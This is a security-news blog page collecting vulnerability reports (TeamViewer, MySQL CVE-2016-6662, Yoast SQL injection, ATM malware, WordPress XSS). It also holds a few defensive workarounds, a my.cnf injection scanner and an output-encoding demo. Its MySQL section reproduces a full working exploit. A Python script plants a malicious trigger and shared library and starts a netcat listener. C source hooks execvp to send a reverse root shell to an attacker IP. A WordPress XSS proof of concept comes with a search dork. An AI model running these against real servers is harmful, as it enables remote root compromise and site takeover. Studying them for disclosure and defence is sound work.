Warning for TeamViewer Users: There Is a Bug That Could Get Your Computer Hacked

Have you used, or are you still using, TeamViewer to provide services to clients? Be careful, and get ready to update to the latest version. There is a fairly serious bug that allows a hacker to turn the connection around and take control of the computer on the other end of a TeamViewer session.

It was Gellin, a GitHub user, who disclosed this vulnerability to the public. The proof of concept he published on GitHub here has already been forked more than 25 times.


Two Zero-Day Exploits Hit the MySQL Database! (+ Temporary Workarounds)

Two dangerous zero-day exploits have just been found in the world's most popular database, MySQL. A hacker who abuses these holes can gain full access to the database and easily become root. Very dangerous, friends…

It was Dawid Golunski of LegalHackers, Poland, who found these dangerous holes. The two exploits are filed as CVE-2016-6662 and CVE-2016-6663 and affect every MySQL version up to the latest release, as well as all MySQL forks/derivatives such as MariaDB and PerconaDB.

You can read the full technical write-up and the source code of the proof-of-concept exploit here.

CVE-2016-6662 targets a weakness in the MySQL configuration file (my.cnf), into which a hacker can inject specially prepared settings; the key to the weakness lies in the mysqld_safe daemon. mysqld_safe is used as a wrapper by a great many MySQL packages and, more generally (to this day), by installations that rely on it to start the MySQL service.

mysqld_safe is executed as root, and, don't be surprised, mysqld (MySQL's main daemon) drops all of its privileges down to the level of the mysql user. As quoted from Golunski:

“If an attacker managed to inject a path to their malicious library within the config, they would be able to preload an arbitrary library and thus execute arbitrary code with root privileges when MySQL service is restarted (manually, via a system update, package update, system reboot, etc.)”

A quick summary of the proof of concept, as far as I can condense it here, is as follows:
  1. Inject a malicious configuration into an existing MySQL configuration file that has the weakest but still usable permissions (for example a configuration file that is used/written by the mysql user itself).

At this stage the hacker can inject a specially prepared MySQL library that is set up as a permanent exploit, unnoticed (unless someone is watching closely), because the exploit runs as a MySQL module.

  2. Create a new configuration file in the writable MySQL data directory, which is among the __default__ configuration locations. Very dangerous, because creating it requires no special permission setup.

This still goes through mysqld_safe, and uses a special trick to get around MySQL's restriction on SELECT xxx OUTFILE.

For example:

mysql> set global general_log_file = '/var/lib/mysql/my.cnf';
mysql> set global general_log = on;
mysql> select '
    '> 
    '> ; injected config entry
    '> 
    '> [mysqld]
    '> malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so
    '> 
    '> [separator]
    '> 
    '> ';
1 row in set (0.00 sec)
mysql> set global general_log = off;

As a result, the settings above end up in my.cnf :)

  3. The hacker only needs SELECT/FILE access permissions to be able to write to MySQL's main configuration (in the default section).

An example trigger that can be used:

CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf
AFTER INSERT
   ON `active_table` FOR EACH ROW
BEGIN
   DECLARE void varchar(550);
   set global general_log_file='/var/lib/mysql/my.cnf';
   set global general_log = on;
   select "
[mysqld]
malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'

" INTO void;   
   set global general_log = off;
END;

heheu, then continue with this:

SELECT '....trigger_code...' INTO DUMPFILE '/var/lib/mysql/activedb/active_table.TRG'

And the trigger above will be executed as soon as new data is written to that table even once (a single INSERT INTO query is enough).

Temporary Workarounds

At the time this news and the proof of concept spread, Oracle had not released any patch. MariaDB and PerconaDB, however, have already issued warnings and dedicated patches. So the temporary measures that can be taken are:

  1. Regularly back up my.cnf and restore it from our known-good configuration, as a precaution against new entries slipping in
  2. Update MySQL (while waiting for Oracle to release a patch)
  3. Tighten the security of your CMS/information system, especially against SQL injection (remember, SELECT permission alone is enough to wreck a server with the exploit above, heuheu)
  4. Move to MariaDB or PerconaDB (sorry to say, Oracle is not too serious about developing MySQL; they just bought it and touch it when they need to…)
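Workaround 1 above (keep watching my.cnf for entries that should not be there) can be automated. The script below is an added example written for this post; it is not LegalHackers' code and not part of MySQL. It checks MySQL option files for the traces the vectors above leave behind: the general-log header line that the general_log trick writes into the file (the same string the hook library on this page searches for), a malloc_lib preload directive, a second [mysqld] section, and option files that are group- or world-writable. The list of option-file paths and the sample injected file are assumptions constructed for the example.

```python
#!/usr/bin/env python3
# Added example (not from the page, LegalHackers or MySQL): a defender-side
# check for the CVE-2016-6662 injection vectors described in this post.
import os
import re
import stat

# Prefix of the line the general log writes when a log file is (re)opened.
# The hook library on this page searches for the same string when it cleans
# up, so its presence inside an option file is a strong injection indicator.
GENERAL_LOG_MARKER = "/usr/sbin/mysqld, Version"

# Option names mysqld_safe honours for preloading a library into mysqld.
PRELOAD_KEYS = ("malloc_lib", "malloc-lib")

# Option-file locations commonly read on Linux (assumed list for this example;
# /var/lib/mysql/my.cnf is the data-directory location the advisory abuses).
DEFAULT_OPTION_FILES = (
    "/etc/my.cnf",
    "/etc/mysql/my.cnf",
    "/var/lib/mysql/my.cnf",
)

SECTION_RE = re.compile(r"^\[([^\]]+)\]$")


def scan_config_text(text):
    """Return a list of (line_number, description) findings for option-file text."""
    findings = []
    mysqld_sections = 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if GENERAL_LOG_MARKER in line:
            findings.append((lineno, "general-log header inside an option file"))
            continue
        match = SECTION_RE.match(line)
        if match:
            if match.group(1).lower() == "mysqld":
                mysqld_sections += 1
                if mysqld_sections > 1:
                    findings.append((lineno, "repeated [mysqld] section"))
            continue
        if not line or line.startswith(("#", ";")):
            continue  # blank line or comment
        key = line.partition("=")[0].strip().lower()
        if key in PRELOAD_KEYS:
            findings.append((lineno, "library preload directive: " + line))
    return findings


def writable_by_group_or_others(path):
    """True if the option file carries group or world write bits.

    The first vector on this page needs an option file that the mysql account
    can write to; loose write bits on a file mysqld_safe reads are exactly that.
    """
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def scan_option_file(path):
    """Scan one option file on disk; content findings plus a permission finding."""
    with open(path, "r", errors="replace") as fh:
        findings = scan_config_text(fh.read())
    if writable_by_group_or_others(path):
        findings.append((0, "option file is group/world writable"))
    return findings


# Constructed sample input: a clean my.cnf, and the same file after the
# general_log trick from this post appended to it (the log header line imitates
# MySQL 5.5-era output; the version string is made up for the example).
SAMPLE_CLEAN = """[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
"""

SAMPLE_INJECTED = SAMPLE_CLEAN + """/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306  Unix socket: /var/lib/mysql/mysql.sock
Time                 Id Command    Argument
160912 10:00:00\t    3 Query\tselect '

; injected config entry

[mysqld]
malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so

[separator]

'
"""

if __name__ == "__main__":
    for path in DEFAULT_OPTION_FILES:
        if os.path.exists(path):
            for lineno, desc in scan_option_file(path):
                print("%s:%d: %s" % (path, lineno, desc))
    print("clean sample:", scan_config_text(SAMPLE_CLEAN))
    print("injected sample:", scan_config_text(SAMPLE_INJECTED))
```

Run it from cron as root and alert on any non-empty output; the permission check matters as much as the content check, because an option file mysqld_safe reads that the mysql user can write is the precondition for the first vector.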

Source Code

#!/usr/bin/python

# This is a limited version of the PoC exploit. It only allows appending to
# existing mysql config files with weak permissions. See V) 1) section of 
# the advisory for details on this vector. 
#
# Full PoC will be released at a later date, and will show how attackers could
# exploit the vulnerability on default installations of MySQL on systems with no
# writable my.cnf config files available.
#
# The upcoming advisory CVE-2016-6663 will also make the exploitation trivial
# for certain low-privileged attackers that do not have FILE privilege.
# 
# See full advisory for details:
# http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt
#
# Stay tuned 😉

intro = """
0ldSQL_MySQL_RCE_exploit.py (ver. 1.0)
(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit

For testing purposes only. Do no harm.

Discovered/Coded by:

Dawid Golunski
http://legalhackers.com

"""

import argparse
import mysql.connector    
import binascii
import subprocess


def info(str):
    print "[+] " + str + "\n"

def errmsg(str):
    print "[!] " + str + "\n"

def shutdown(code):
    if (code==0):
        info("Exiting (code: %d)\n" % code)
    else:
        errmsg("Exiting (code: %d)\n" % code)
    exit(code)


cmd = "rm -f /var/lib/mysql/pocdb/poctable.TRG ; rm -f /var/lib/mysql/mysql_hookandroot_lib.so"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(result, error) = process.communicate()
rc = process.wait() 


# where will the library to be preloaded reside? /tmp might get emptied on reboot
# /var/lib/mysql is safer option (and mysql can definitely write in there 😉
malloc_lib_path='/var/lib/mysql/mysql_hookandroot_lib.so'


# Main Meat

print intro

# Parse input args
parser = argparse.ArgumentParser(prog='0ldSQL_MySQL_RCE_exploit.py', description='PoC for MySQL Remote Root Code Execution / Privesc CVE-2016-6662')
parser.add_argument('-dbuser', dest='TARGET_USER', required=True, help='MySQL username') 
parser.add_argument('-dbpass', dest='TARGET_PASS', required=True, help='MySQL password')
parser.add_argument('-dbname', dest='TARGET_DB',   required=True, help='Remote MySQL database name')
parser.add_argument('-dbhost', dest='TARGET_HOST', required=True, help='Remote MySQL host')
parser.add_argument('-mycnf', dest='TARGET_MYCNF', required=True, help='Remote my.cnf owned by mysql user')
                  
args = parser.parse_args()


# Connect to database. Provide a user with CREATE TABLE, SELECT and FILE permissions
# CREATE requirement could be bypassed (malicious trigger could be attached to existing tables)
info("Connecting to target server %s and target mysql account '%s@%s' using DB '%s'" % (args.TARGET_HOST, args.TARGET_USER, args.TARGET_HOST, args.TARGET_DB))
try:
    dbconn = mysql.connector.connect(user=args.TARGET_USER, password=args.TARGET_PASS, database=args.TARGET_DB, host=args.TARGET_HOST)
except mysql.connector.Error as err:
    errmsg("Failed to connect to the target: {}".format(err))
    shutdown(1)

try:
    cursor = dbconn.cursor()
    cursor.execute("SHOW GRANTS")
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(2)

privs = cursor.fetchall()
info("The account in use has the following grants/perms: " )
for priv in privs:
    print priv[0]
print ""


# Compile mysql_hookandroot_lib.so shared library that will eventually hook to the mysqld 
# process execution and run our code (Remote Root Shell)
# Remember to match the architecture of the target (not your machine!) otherwise the library
# will not load properly on the target.
info("Compiling mysql_hookandroot_lib.so")
cmd = "gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(result, error) = process.communicate()
rc = process.wait() 
if rc != 0:
    errmsg("Failed to compile mysql_hookandroot_lib.so: %s" % cmd)
    print error 
    shutdown(2)

# Load mysql_hookandroot_lib.so library and encode it into HEX
info("Converting mysql_hookandroot_lib.so into HEX")
hookandrootlib_path = './mysql_hookandroot_lib.so'
with open(hookandrootlib_path, 'rb') as f:
    content = f.read()
    hookandrootlib_hex = binascii.hexlify(content)

# Trigger payload that will elevate user privileges and sucessfully execute SET GLOBAL GENERAL_LOG 
# Decoded payload (paths may differ):
"""
DELIMITER //
CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf
AFTER INSERT
   ON `poctable` FOR EACH ROW
BEGIN

   DECLARE void varchar(550);
   set global general_log_file='/var/lib/mysql/my.cnf';
   set global general_log = on;
   select "

# 0ldSQL_MySQL_RCE_exploit got here 🙂

[mysqld]
malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'

[abyss]
" INTO void;   
   set global general_log = off;

END; //
DELIMITER ;
"""
trigger_payload="""TYPE=TRIGGERS
triggers='CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf\\nAFTER INSERT\\n   ON `poctable` FOR EACH ROW\\nBEGIN\\n\\n   DECLARE void varchar(550);\\n   set global general_log_file=\\'%s\\';\\n   set global general_log = on;\\n   select "\\n\\n# 0ldSQL_MySQL_RCE_exploit got here :)\\n\\n[mysqld]\\nmalloc_lib=\\'%s\\'\\n\\n[abyss]\\n" INTO void;   \\n   set global general_log = off;\\n\\nEND'
sql_modes=0
definers='root@localhost'
client_cs_names='utf8'
connection_cl_names='utf8_general_ci'
db_cl_names='latin1_swedish_ci'
""" % (args.TARGET_MYCNF, malloc_lib_path)

# Convert trigger into HEX to pass it to unhex() SQL function
trigger_payload_hex = "".join("{:02x}".format(ord(c)) for c in trigger_payload)

# Save trigger into a trigger file
TRG_path="/var/lib/mysql/%s/poctable.TRG" % args.TARGET_DB
info("Saving trigger payload into %s" % (TRG_path))
try:
    cursor = dbconn.cursor()
    cursor.execute("""SELECT unhex("%s") INTO DUMPFILE '%s' """ % (trigger_payload_hex, TRG_path) )
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(4)

# Save library into a trigger file
info("Dumping shared library into %s file on the target" % malloc_lib_path)
try:
    cursor = dbconn.cursor()
    cursor.execute("""SELECT unhex("%s") INTO DUMPFILE '%s' """ % (hookandrootlib_hex, malloc_lib_path) )
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(5)

# Creating table poctable so that /var/lib/mysql/pocdb/poctable.TRG trigger gets loaded by the server
info("Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded")
try:
    cursor = dbconn.cursor()
    cursor.execute("CREATE TABLE `poctable` (line varchar(600)) ENGINE='MyISAM'"  )
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(6)

# Finally, execute the trigger's payload by inserting anything into `poctable`. 
# The payload will write to the mysql config file at this point.
info("Inserting data to `poctable` in order to execute the trigger and write data to the target mysql config %s" % args.TARGET_MYCNF )
try:
    cursor = dbconn.cursor()
    cursor.execute("INSERT INTO `poctable` VALUES('execute the trigger!');" )
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(6)

# Check on the config that was just created
info("Showing the contents of %s config to verify that our setting (malloc_lib) got injected" % args.TARGET_MYCNF )
try:
    cursor = dbconn.cursor()
    cursor.execute("SELECT load_file('%s')" % args.TARGET_MYCNF)
except mysql.connector.Error as err:
    errmsg("Something went wrong: {}".format(err))
    shutdown(2)
finally:
    dbconn.close()  # Close DB connection
print ""
myconfig = cursor.fetchall()
print myconfig[0][0]
info("Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :)")

# Spawn a Shell listener using netcat on 6033 (inverted 3306 mysql port so easy to remember 😉
info("Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :)" )
listener = subprocess.Popen(args=["/bin/nc", "-lvp","6033"])
listener.communicate()
print ""

# Show config again after all the action is done
info("Shell closed. Hope you had fun. ")

# Mission complete, but just for now... Stay tuned 🙂
info("""Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can craft a new valid my.cnf (i.e no writable my.cnf required) ;)""")


# Shutdown
shutdown(0)

mysql module:

/*

(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit
mysql_hookandroot_lib.c

This is the shared library injected by 0ldSQL_MySQL_RCE_exploit.py exploit.
The library is meant to be loaded by mysqld_safe on mysqld daemon startup
to create a reverse shell that connects back to the attacker's host on
6603 port (mysql port in reverse 😉 and provides a root shell on the
target. 

mysqld_safe will load this library through the following setting:

[mysqld]
malloc_lib=mysql_hookandroot_lib.so

in one of the my.cnf config files (e.g. /etc/my.cnf).

This shared library will hook the execvp() function which is called
during the startup of mysqld process. 
It will then fork a reverse shell and clean up the poisoned my.cnf
file in order to let mysqld run as normal so that:
'service mysql restart' will work without a problem.

Before compiling adjust IP / PORT and config path.


~~
Discovered/Coded by:

Dawid Golunski
http://legalhackers.com


~~
Compilation (remember to choose settings compatible with the remote OS/arch):

gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl

Disclaimer:

For testing purposes only. Do no harm.

Full advisory URL:
http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt

*/

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
#include <dlfcn.h>
#include <stdlib.h>
#include <stdarg.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define ATTACKERS_IP "127.0.0.1"
#define SHELL_PORT 6033
#define INJECTED_CONF "/var/lib/mysql/my.cnf"

char* env_list[] = { "HOME=/root", NULL };
typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]);
static execvp_func_t old_execvp = NULL;


// fork & send a bash shell to the attacker before starting mysqld
void reverse_shell(void) {

    int i; int sockfd;
    //socklen_t socklen;
    struct sockaddr_in srv_addr;
    srv_addr.sin_family = AF_INET; 
    srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port
    srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip 

    // create new TCP socket && connect
    sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
    connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
	
    for(i = 0; i <= 2; i++) dup2(sockfd, i);
    execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list );

    exit(0);
}


/*
 cleanup injected data from the target config before it is read by mysqld
 in order to ensure clean startup of the service

 The injection (if done via logging) will start with a line like this:

 /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:

*/

int config_cleanup() {

    FILE *conf;
    char buffer[2000];
    long cut_offset=0;

    conf = fopen(INJECTED_CONF, "r+");
    if (!conf) return 1;

    while (!feof(conf)) {
       fgets(buffer, sizeof(buffer), conf);
       if (strstr(buffer,"/usr/sbin/mysqld, Version")) {
	  cut_offset = (ftell(conf) - strlen(buffer));
       }

    }
    if (cut_offset>0) ftruncate(fileno(conf), cut_offset);
    fclose(conf);
    return 0;

}


// execvp() hook
int execvp(const char* filename, char* const argv[]) {

    pid_t  pid;
    int fd;

    // Simple root PoC (touch /root/root_via_mysql)
    fd = open("/root/root_via_mysql", O_CREAT);
    close(fd);

    old_execvp = dlsym(RTLD_NEXT, "execvp");

    // Fork a reverse shell and execute the original execvp() function
    pid = fork();
    if (pid == 0) 
          reverse_shell();

    // clean injected payload before mysqld is started
    config_cleanup();
    return old_execvp(filename, argv);
}

Sources:
– LegalHackers.com (http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html)
– The Hacker News (http://thehackernews.com/2016/09/hack-mysql-database.html)

Beware of SQL Injection for WordPress SEO by Yoast Plugin Users!

A critical vulnerability has been discovered in the most popular plugin of the WordPress content management platform (CMS) that puts tens of millions of websites at risk of being hacked by attackers.

The vulnerability actually resides in most versions of a WordPress plugin known as ‘WordPress SEO by Yoast,’ which has more than 14 million downloads according to the Yoast website, making it one of the most popular WordPress plugins for easily optimizing websites for search engines, i.e. search engine optimization (SEO).

The vulnerability in WordPress SEO by Yoast has been discovered by Ryan Dewhurst, developer of the WordPress vulnerability scanner ‘WPScan’.

All the versions prior to 1.7.3.3 of ‘WordPress SEO by Yoast’ are vulnerable to Blind SQL Injection web application flaw.

via TheHackerNews.com

Facebook Rewards Security Researcher 400 Million Rupiah for a Remote Code Execution Flaw He Found

Facebook has rewarded a Brazilian computer engineer and security researcher, Reginaldo Silva, with US$33,500, or more than 400 million rupiah, for finding and reporting a vulnerability in Facebook.

With bugs and security holes getting ever harder to find these days, a reward of this size from Facebook is one of the largest paid out so far.

New Malware from USB Drives is Targeting Windows XP ATM

Some types of automated teller machine (ATM) malware are designed to steal sensitive information. However, there are some threats that enable the attacker to command the machine to simply hand over money.

Last week, at the Chaos Communication Congress (CCC), a couple of German researchers revealed finding a piece of malware that gives cybercriminals the ability to gain control of an ATM and instruct it to dispense money.

According to Wired, the malicious element is installed on a USB drive. The attacker goes to a vulnerable ATM running Windows XP, and cuts a piece of its chassis to gain access to its USB port.

Older Android Versions Are Vulnerable to Viruses

Millions of Android smartphone users are at risk of becoming victims of cybercrime, such as attacks carried out through viruses and malware. This was stated in an internal bulletin prepared by the United States Department of Homeland Security and the FBI.

As quoted by Business Insider from the Public Intelligence site, Android, as the most widely distributed mobile operating system, continues to be a target of attacks because of “its market share and open source architecture”.

“Some 44 percent of Android users are still running operating system versions 2.3.3 through 2.3.7, known as Gingerbread, which was released in 2011 and has a number of security holes that were fixed in later versions,” the bulletin says.

Warning: SMS-Sabotaging Virus on Android

Jakarta – Yet another new malicious program targeting Android has been found. This trojan sabotages the SMS feature on the phones it infects and ultimately drains the phone owner's wallet.

Known as HippoSMS, the virus infiltrates the Android device's short message feature, then takes it over and subscribes the device to premium SMS services.

Premium SMS naturally carries above-average charges that the phone's owner has to bear. Worse still, the damage done by HippoSMS does not stop there.

How to Fix STOP: 0x0000006B Windows 7 BSOD Error

Previously here we have covered several fixes for Windows, like Windows 7 Startup black screen of death, Windows 7 endless reboot after upgrade from Windows Vista, Windows 7 is not genuine error etc. Now here is yet another fix for Windows 7.

Microsoft has identified an issue on Windows 7 which crashes (BSOD) during start process with STOP: 0x0000006B error message and fails to boot. The complete error message looks like below,

BackWPup Vulnerabilities?

A remote execution vulnerability has been discovered in WordPress backup utility BackWPup.

According to Sydney (Australia) company Sense of Security, which published the advisory along with a proof-of-concept, the vulnerability allows local or remote PHP files to be passed to a component of the utility.

“The input passed to the component wp_xml_export.php via the ‘wpabs’ variable allows the inclusion and execution of local or remote PHP files as long as a ‘_nonce’ value is known. The ‘_nonce’ value relies on a static constant which is not defined in the script meaning that it defaults to the value ‘822728c8d9’”, the advisory states.

Sense of Security says the vulnerability affects at least BackWPup Version 1.6.1 (the platform on which it has been tested), and users should upgrade to Version 1.7.1. Via TheRegister

Watch Out for a Bug in Mundi Mail, Again

I have just received information from a friend about vulnerabilities in the Mundi application. Mundi is an e-mail management application used by various companies/institutions.

This time the buggy version is Mundi 0.8.2 (possibly earlier versions too). It looks quite serious, because an attacker can execute commands remotely and repeatedly. The fault stems from imperfect input validation.

WordPress 3.3 XSS Vulnerability Example & Proof of Concept

This is a proof of concept of the XSS vulnerability in WordPress 3.3, written by Aditya Modha and Samir Shah. Enjoy it:

# Exploit Title: Reflected Cross Site Scripting in wordpress 3.3
# Google Dork: intext:”Proudly powered by WordPress”
# Date: 2.Jan.2012
# Author: Aditya Modha, Samir Shah
# Greetz: Jigar Soni, Mr 52
# Software Link: http://www.wordpress.org/download/
# Version: 3.3
# Tested on: apache
# CVE : Nope.

Step 1: Post a comment to the target website

Step 2: Replace the value of the author tag, email tag and comment tag with the exact values that were posted in the last comment. Change the value of comment_post_ID to the value of the post (which can be found by opening that post and checking the value of the p parameter in the URL). For example, if the URL is http://192.168.1.102/wordpress/?p=6 then the value of comment_post_ID is 6.

<html>
<title>Wordpress 3.3 XSS PoC</title>

<body>

<form name="XSS" id="XSS" action="http://host/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="replace me">
<input type="hidden" name="email" value="replace me">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="replace me">
<input type="hidden" name="submit" value="Post Comment">
<input type="hidden" name="comment_post_ID" value="replace me">
<input type="hidden" name="comment_parent" value="0">
<input type="submit" value="Click Me" />
</form>

</body>
</html>

Step 3: Publish the above HTML file on the web server and access it. Click the “Click Me” button. This will try to post the comment to WordPress, which will flag it as a duplicate comment with a 500 Internal Server Error response. Here our XSS payload gets executed. Check the wordpress_3.3_xss.png file.

Step 4: The response code where XSS payload reflects is given below

<!DOCTYPE html>
<!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono
-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>WordPress &rsaquo; Error</title>
 <style type="text/css">
  html {
   background: #f9f9f9;
  }
  body {
   background: #fff;
   color: #333;

               ..............snip....................

  .button {
   background: #f2f2f2 url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad.png) repeat-x scroll left top;
  }

  .button:active {
   background: #eee url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad-active.png) repeat-x scroll left top;
  }
   </style>
</head>
<body id="error-page">
 <p>Duplicate comment detected; it looks as though you&#8217;ve already said that!</p></body>
</html>

UPDATE: It will even work if you do not supply any comment data. The duplicate comment event is not necessary. And I forgot to mention that this will only work with Internet Explorer, since other browsers like Firefox and Chrome will URL-encode our XSS payload.

<html>
<title>Wordpress 3.3 XSS PoC</title>

<body>

<form name="XSS" id="XSS" action="http://host/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="oldman">
<input type="hidden" name="email" value="oldmanlab@gmail.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="">
<input type="hidden" name="submit" value="Post Comment">
<input type="hidden" name="comment_post_ID" value="replace_me">
<input type="hidden" name="comment_parent" value="0">
<input type="submit" value="Click Me" />
</form>

</body>
</html>

Please respect the system administrator, don’t crack too much and warn him. Update your WordPress A.S.A.P!
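The response dump in Step 4 shows where the bug lives: the request URI is pasted raw into a CSS url() inside the error page's <style> block, so a URI containing </style><script> closes the style element and opens a script. The following is an added illustration written for this post, not WordPress code and not the fix WordPress shipped; the TEMPLATE string, the render_* functions and the intact-check are assumptions of the example. It renders the same style fragment once the vulnerable way and once with the request URI percent-encoded for the URL-inside-<style> context, and shows that a benign URI is left untouched while the PoC payload can no longer break out.

```python
#!/usr/bin/env python3
# Added example (not WordPress code): reflected request URI inside a <style>
# block, vulnerable rendering beside a hardened one.
from urllib.parse import quote

# The PoC's request URI as it appears in the response dump on this page.
PAYLOAD_URI = ("/wordpress/wp-comments-post.php?"
               "</style><script>document.write(Date())</script><style>")

# Assumed stand-in for the error page's stylesheet fragment; the %s is where
# the page's output shows the raw request URI being interpolated.
TEMPLATE = ('<style type="text/css">\n'
            '  .button {\n'
            '   background: #f2f2f2 url(http://192.168.1.102%s'
            '/wp-admin/images/white-grad.png) repeat-x scroll left top;\n'
            '  }\n'
            '</style>')


def render_style_vulnerable(request_uri):
    """Mirrors the page's response: the raw request URI is pasted into url()."""
    return TEMPLATE % request_uri


def render_style_hardened(request_uri):
    """Percent-encode the URI for the context it is emitted into.

    Inside a <style> element the browser does not decode HTML entities, so
    entity-encoding would not help; what must never appear is a literal '<'
    (which can spell '</style') or the characters that end a url() token.
    quote() leaves alphanumerics, the RFC 3986 unreserved set and the listed
    URL delimiters alone and turns everything else into %XX escapes.
    """
    url_safe = quote(request_uri, safe="/?=&:@%.-_~")
    return TEMPLATE % url_safe


def style_block_is_intact(markup):
    """True if exactly one <style ...> opener and one </style> closer remain,
    i.e. nothing in the interpolated URI escaped the style context."""
    lowered = markup.lower()
    return lowered.count("<style") == 1 and lowered.count("</style>") == 1


if __name__ == "__main__":
    for label, render in (("vulnerable", render_style_vulnerable),
                          ("hardened", render_style_hardened)):
        out = render(PAYLOAD_URI)
        print("%s: style intact=%s, script tag present=%s" % (
            label, style_block_is_intact(out), "<script" in out))
```

The check in style_block_is_intact is a test helper, not a sanitizer: the defence is choosing the encoding that matches the output context, which here is a URL token inside raw <style> text. The PoC's note that Firefox and Chrome URL-encode the payload is the same mechanism applied client-side; the server must not depend on it.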

XSS Security Hole in WordPress 3.2.1

WordPress users, especially those on version 3.2.1, should update their installation immediately. There is an XSS security hole that gives guests the opportunity to write on article pages, archive pages and tag pages.

Read the full details of the XSS here: http://wordpress.or.id/xss-vulnerability-pada-wordpress-3-2-1.html